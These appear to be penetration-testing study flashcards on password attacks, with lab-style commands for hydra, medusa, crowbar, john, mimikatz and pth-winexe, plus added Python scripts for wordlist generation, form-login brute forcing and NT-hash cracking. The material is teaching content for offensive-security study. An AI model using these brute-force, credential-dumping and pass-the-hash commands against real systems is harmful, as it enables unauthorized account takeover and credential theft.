Password Attacks Flashcards
What is the name of the tool that creates a custom word list based on the website?
Give an example using it with the URL www.megacorpone.com
- cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
What is the name of the tool that is a fast password cracker with the ability to generate custom wordlists?
Where is the configuration file to alter password rules?
- John The Ripper
- /etc/john/john.conf
How would you add a rule to JTR that appends a 2-digit number to the end of each password?
- sudo vim /etc/john/john.conf
- add the line $[0-9]$[0-9] under the [List.Rules:Wordlist] section (the rule set john applies when run with --rules)
What is a wordlist generator provided with Kali that can create word lists based on specific password policies?
Crunch
What are the character placeholder translations for ‘crunch’?
- @ = lower case alpha characters
- , = upper case alpha characters
- % = numeric characters
- ^ = special characters including spaces
Use ‘crunch to create a word list that is 8 characters in length, and follows the password structure of [capital letter][2 x lower case letters][2 x special characters][3 x numeric characters]
- crunch 8 8 -t ,@@^^%%%
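Worked example, added here and not part of the original flashcards or of crunch or john themselves: a Python reimplementation of the two wordlist-generation ideas above, the crunch -t placeholder expansion and the john rule $[0-9]$[0-9]. It uses crunch's fixed lowercase, uppercase and digit sets exactly, but the special-character set is an assumption (Python's string.punctuation plus space, 33 symbols) that only approximates crunch's own, so any count involving ^ is close to but not identical with crunch's. The function names pattern_size, crunch_pattern, append_two_digits and first_n are this example's own.

```python
import itertools
import string

# Character classes behind crunch's -t placeholders. @ , % match crunch exactly;
# ^ is an ASSUMPTION (ASCII punctuation plus space) standing in for crunch's
# own special-character set, which differs slightly.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,    # 26 lower-case letters
    ",": string.ascii_uppercase,    # 26 upper-case letters
    "%": string.digits,             # 10 digits
    "^": string.punctuation + " ",  # 33 symbols including space (assumption)
}


def pattern_size(pattern):
    """Number of candidates a -t pattern expands to; literal characters count once."""
    size = 1
    for ch in pattern:
        size *= len(CRUNCH_CLASSES.get(ch, ch))
    return size


def crunch_pattern(pattern):
    """Yield every word matching a crunch -t pattern, rightmost position changing
    fastest (the order crunch emits). Non-placeholder characters are copied literally."""
    pools = [CRUNCH_CLASSES.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def append_two_digits(words):
    """Same mangling as the john rule $[0-9]$[0-9]: every word is emitted with
    each of the 100 two-digit suffixes 00..99, so the list grows 100x."""
    for word in words:
        for n in range(100):
            yield "%s%02d" % (word, n)


def first_n(gen, n):
    """Materialise the first n candidates of a generator without expanding the rest."""
    return list(itertools.islice(gen, n))


if __name__ == "__main__":
    page_pattern = ",@@^^%%%"  # the 8-character policy from the flashcard above
    print("candidates for %s: %d" % (page_pattern, pattern_size(page_pattern)))
    print("first five:", first_n(crunch_pattern(page_pattern), 5))
    print("john-style mangling of 'megacorp':",
          first_n(append_two_digits(["megacorp"]), 3), "...")
```

With the 33-symbol assumption the page's pattern expands to 26^3 * 33^2 * 10^3, roughly 19 billion candidates, which is why a policy-shaped list like this is normally piped straight into the cracker rather than written to disk with -o; the same arithmetic applies to the john rule, which turns every wordlist entry into 100 candidates.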
What are some risks with network service password attacks?
- noisy
- generate logs
- may lock accounts out
What command prepares the ‘rockyou’ word list for use?
- sudo gunzip /usr/share/wordlists/rockyou.txt.gz
What tool is best used for an HTTP htaccess password attack?
- Medusa
- THC-Hydra
How would you use Medusa to attack the ‘admin’ account on an HTTP server at 10.11.0.22 on the ‘/admin’ page, with the ‘rockyou’ word list?
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
What tool is recommended to for an RDP password attack?
- crowbar
How do you install ‘crowbar’?
- sudo apt install crowbar
What command would attempt an RDP password attack against 10.11.0.22/32 with the user ‘admin’ and password file ‘password-file.txt’?
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
What tool is recommended for SSH password attacks?
THC-Hydra
How would you use THC-Hydra for an SSH password attack against 10.11.0.22 with the ‘rockyou’ wordlist against the ‘admin’ user?
- hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.11.0.22
What tool is recommended for an HTTP POST password attack?
- THC-Hydra
What needs to be known for an HTTP Post password attack with Hydra?
- IP address
- URL of webpage containing the web form
- ‘condition string’ that indicates an unsuccessful login attempt (ex. INVALID LOGIN)
What is the best way to get the information required for Hydra for an HTTP Post password attack?
- view the page source on the login page
- this should show what page handles the POST request (ex. /form/frontpage.php)
What command should be used for an HTTP POST password attack with Hydra, given the following information:
- IP = 10.11.0.22
- POST URL = /form/frontpage.php
- user = admin
- condition string = ‘INVALID LOGIN’
- wordlist = rockyou
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
- the module argument is page:POST-body:failure-string; ^PASS^ is replaced by each candidate (user=^USER^ would take the name from -l instead of hardcoding it), -vV shows every attempt, and -f stops after the first valid login/password pair
- if the failure string never appears in the response (typo, wrong page), hydra reports the very first candidate as valid
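Added example, not code from the original page or from hydra: a Python sketch of what the http-form-post module does, run against a constructed local login form so the role of the condition string can be seen end to end. The path /form/frontpage.php is the one from the flashcard but is served locally here; the field names user and pass, the valid password letmein1, the four-word candidate list, the stub server and the function names form_post_attack and run_demo are all assumptions made for this demo.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target for the demo (assumption, not a real host): one valid account.
VALID_CREDS = {"admin": "letmein1"}
LOGIN_PATH = "/form/frontpage.php"   # same path as the flashcard, served locally here
FAIL_STRING = "INVALID LOGIN"        # the 'condition string' hydra keys on


class _LoginHandler(BaseHTTPRequestHandler):
    """Minimal login form: 200 with 'INVALID LOGIN' on failure, a welcome page on success."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode("utf-8"))
        user = fields.get("user", [""])[0]
        password = fields.get("pass", [""])[0]
        if self.path == LOGIN_PATH and VALID_CREDS.get(user) == password:
            body = b"<h1>Welcome back</h1>"
        else:
            body = b"<p>INVALID LOGIN</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_target():
    """Bind the stub form on an ephemeral localhost port and serve it in the background."""
    server = HTTPServer(("127.0.0.1", 0), _LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def form_post_attack(base_url, path, user, wordlist, fail_string, stop_on_first=True):
    """Mirror of hydra http-form-post: POST user=<user>&pass=<candidate> for each
    candidate and treat any response that does NOT contain fail_string as a hit.
    stop_on_first mirrors hydra's -f. Returns the (user, password) hits found."""
    # Bypass any proxy environment variables so the request really goes to the local stub.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    hits = []
    for candidate in wordlist:
        data = urllib.parse.urlencode({"user": user, "pass": candidate}).encode()
        with opener.open(base_url + path, data=data, timeout=5) as resp:
            body = resp.read().decode("utf-8", errors="replace")
        if fail_string not in body:
            hits.append((user, candidate))
            if stop_on_first:
                break
    return hits


def run_demo(wordlist=("password", "123456", "letmein1", "qwerty")):
    """Run the attack twice: with the right condition string and with a wrong one.
    The second run reproduces the classic hydra false positive: a condition string
    that never appears makes the very first candidate look like a valid login."""
    server = start_target()
    base = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        correct = form_post_attack(base, LOGIN_PATH, "admin", wordlist, FAIL_STRING)
        wrong = form_post_attack(base, LOGIN_PATH, "admin", wordlist, "NO SUCH TEXT")
    finally:
        server.shutdown()
        server.server_close()
    return correct, wrong


if __name__ == "__main__":
    correct, wrong = run_demo()
    print("condition string 'INVALID LOGIN':", correct)
    print("condition string 'NO SUCH TEXT' :", wrong)
```

The second result is the check to run before a long attack: if the first candidate in the list is reported as valid, the condition string is wrong, not the password.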
What tool is recommended for identifying the type of hash?
hashid
Given a hash '$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE.bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0', how would you check for the possible hashing algorithms used to create this hash?
kali@kali:~$ hashid '$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE.bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0'
Analyzing '$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE.bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0'
[+] SHA-512 Crypt
- single-quote the hash: it contains $ characters that the shell would otherwise expand
What is a recommended website for looking up hashes?
HashKiller
On Windows, where are hashed user passwords stored?
- SAM
- Security Accounts Manager
What protective mechanism was implemented to protect against offline SAM database password attacks?
- SYSKEY
- Partially encrypts the SAM file
What is the recommended tool to extract hashes from Windows systems?
mimikatz
What does mimikatz do?
- Among other things, mimikatz facilitates password hash extraction from the Local Security Authority Subsystem Service (LSASS) process memory, where they are cached
- Since LSASS is a privileged process running under the SYSTEM user, we must launch mimikatz from an administrative command prompt
In order to extract password hashes with mimikatz, what three commands need to be run?
- privilege::debug = enables the SeDebugPrivilege access right required to tamper with another process
  * if this command fails, mimikatz was most likely not executed with admin privs
- token::elevate = elevates the security token from high integrity (administrator) to SYSTEM integrity
  * LSASS is a SYSTEM process, which means it has even higher privileges than mimikatz running with admin privs
- lsadump::sam = dumps the contents of the SAM database
What is pass-the-hash?
- allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a clear text password
- this is possible because NTLM/LM password hashes are not salted and remain static between sessions
What tool is recommended for passing-the-hash?
pth-winexe
If we have extracted a hash ‘hashhashhash’ for user ‘offsec’, what command would we use from the attacking machine against 10.11.0.22 to get a ‘cmd’ shell?
pth-winexe -U offsec%hashhashhash //10.11.0.22 cmd
What tool is recommended for cracking hashes?
JTR
What command would we use to try cracking NT hashes in a file named hash.txt?
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
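Added example, not code from the page or from john or mimikatz: a pure-Python NT hash (MD4 over the UTF-16LE password) and a dictionary attack over pwdump-style user:rid:LM:NT::: lines, the shape john --format=NT consumes. It makes the pass-the-hash point above concrete: with no salt, two accounts sharing a password share a hash, and one hash computation per candidate tests every account at once. The users offsec, alice and bob, their passwords, the wordlist and the function names are constructed for the demo; MD4 is implemented inline because hashlib.new('md4') depends on OpenSSL's legacy provider being loaded.

```python
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (LM disabled)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 needs OpenSSL's legacy provider)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (function, additive constant, per-position shifts, message word order)
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = [a0, b0, c0, d0]
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                # registers rotate ABCD, DABC, CDAB, BCDA through the 16 steps
                a, b, c, d = (r[(j - i) % 4] for j in range(4))
                r[(-i) % 4] = _rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
        a0, b0, c0, d0 = ((v + w) & MASK32 for v, w in zip((a0, b0, c0, d0), r))
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)): no salt, no iteration, so it never changes."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(lines):
    """Map NT hash -> [users] from 'user:rid:LM:NT:::' (pwdump) or 'user:NT' lines."""
    targets = {}
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) < 2:
            continue
        nthash = fields[3] if len(fields) >= 4 else fields[1]
        targets.setdefault(nthash.lower(), []).append(fields[0])
    return targets


def crack_nt(lines, wordlist):
    """Dictionary attack: hash each candidate once and look it up against every
    target hash. Returns {user: password} for the accounts recovered."""
    targets = parse_pwdump(lines)
    cracked = {}
    for candidate in wordlist:
        for user in targets.get(nt_hash(candidate), []):
            cracked[user] = candidate
    return cracked


# Constructed hash.txt contents (not real accounts). offsec and alice both use
# 'password'; bob's hash is derived here from a different constructed password.
SAMPLE_HASH_TXT = [
    "offsec:1001:%s:8846f7eaee8fb117ad06bdd830b7586c:::" % EMPTY_LM,
    "alice:1002:%s:8846f7eaee8fb117ad06bdd830b7586c:::" % EMPTY_LM,
    "bob:1003:%s:%s:::" % (EMPTY_LM, nt_hash("Winter2024!")),
]
SAMPLE_WORDLIST = ["123456", "password", "letmein", "Winter2024!"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password"))
    print("identical for every account with that password:",
          nt_hash("password") == SAMPLE_HASH_TXT[0].split(":")[3])
    print("cracked:", crack_nt(SAMPLE_HASH_TXT, SAMPLE_WORDLIST))
```

Because the lookup is keyed on the hash alone, the cost of the attack does not grow with the number of accounts in hash.txt; that absence of a per-user salt is also exactly what lets the hash itself be replayed with pth-winexe.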
How would you use JTR to crack hashes on a Linux system?
- use the 'unshadow' utility to combine the 'passwd' and 'shadow' files from the compromised system, redirecting its output to a file
- kali@kali:~$ unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
- crack the combined file with JTR
- kali@kali:~$ john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
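Added example, not from the page or from john or hashid: the merge that unshadow performs and the prefix check hashid applies to crypt(3) hashes, in Python, over constructed passwd and shadow lines. The root entry carries the SHA-512 crypt hash from the hashid flashcard above; the other accounts, the $5$ hash for 'student' (a placeholder, not a real digest) and the function names unshadow, identify_crypt_hash and crackable are constructed for this demo.

```python
# Prefixes of crypt(3) hashes found in /etc/shadow, with the names hashid reports.
CRYPT_PREFIXES = (
    ("$1$", "MD5 Crypt"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "SHA-256 Crypt"),
    ("$6$", "SHA-512 Crypt"),
    ("$7$", "scrypt"),
    ("$y$", "yescrypt"),
)

# Hash taken from the hashid flashcard above, rejoined onto one line.
PAGE_HASH = ("$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE.bI66aMYSeDXKQ8s7JNFwa1s1KkTand"
             "6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0")
STUDENT_HASH = "$5$constructedSalt$notARealSha256CryptDigestJustForTheDemo0"  # constructed

# Constructed excerpts of /etc/passwd and /etc/shadow (not from a real system).
PASSWD_FILE = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "student:x:1000:1000:Student,,,:/home/student:/bin/bash",
    "svc-backup:x:1001:1001::/var/backups:/bin/sh",
]
SHADOW_FILE = [
    "root:%s:19000:0:99999:7:::" % PAGE_HASH,
    "daemon:*:19000:0:99999:7:::",            # no password set
    "student:%s:19000:0:99999:7:::" % STUDENT_HASH,
    "svc-backup:!:19000:0:99999:7:::",        # locked account
]


def identify_crypt_hash(h):
    """Same first step hashid takes on a shadow hash: match the $id$ prefix."""
    for prefix, name in CRYPT_PREFIXES:
        if h.startswith(prefix):
            return name
    return "unknown"


def unshadow(passwd_lines, shadow_lines):
    """What john's unshadow does: put each user's shadow hash into the second
    field of the matching passwd entry; users absent from shadow keep their 'x'."""
    shadow = {}
    for line in shadow_lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            shadow[fields[0]] = fields[1]
    merged = []
    for line in passwd_lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:          # malformed passwd entry, skip it
            continue
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return merged


def crackable(unshadowed_lines):
    """Entries worth feeding to a cracker: skip locked (!...), disabled (*) and
    still-unresolved (x) password fields, and label the hash type of the rest."""
    out = []
    for line in unshadowed_lines:
        fields = line.split(":")
        h = fields[1]
        if not h or h[0] in "!*" or h == "x":
            continue
        out.append((fields[0], identify_crypt_hash(h), h))
    return out


if __name__ == "__main__":
    merged = unshadow(PASSWD_FILE, SHADOW_FILE)
    for entry in merged:
        print(entry)
    print("worth cracking:")
    for user, kind, h in crackable(merged):
        print("  %s  %s  %s..." % (user, kind, h[:20]))
```

Filtering out the locked and passwordless entries before cracking is what keeps john from reporting 'no password hashes loaded' noise and wasting time on accounts that can never be logged into with a password.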
What hash crack tool is recommended if GPUs are available?
hashcat